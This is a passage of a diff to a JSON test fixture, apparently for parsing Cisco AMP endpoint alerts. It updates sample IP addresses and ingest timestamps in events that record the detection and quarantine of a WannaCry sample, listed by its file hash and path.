"8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2115,7 +2115,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2125,8 +2125,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965543464Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389059300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":453000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2146,7 +2146,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2196,7 +2196,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2213,8 +2213,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965545489Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389063900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179222052372000,\"timestamp\":1610623598,\"timestamp_nanoseconds\":437000000,\"date\":\"2021-01-14T11:26:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179222052372503\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2236,7 +2236,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2277,7 +2277,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2287,8 +2287,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965547528Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389067900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2308,7 +2308,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2353,7 +2353,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2363,8 +2363,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965549581Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389071100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":361000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179213462437901\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2384,7 +2384,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2429,7 +2429,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2439,8 +2439,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965551613Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389075200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -2460,7 +2460,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2510,7 +2510,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2527,8 +2527,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965553704Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389080600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":797000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179217757405206\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2550,7 +2550,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2591,7 +2591,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2601,8 +2601,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965555745Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389086Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2622,7 +2622,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2663,7 +2663,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2673,8 +2673,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965557786Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.389091500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179217757405000,\"timestamp\":1610623597,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-14T11:26:37+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2694,7 +2694,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2740,7 +2740,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2757,8 +2757,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965559917Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"i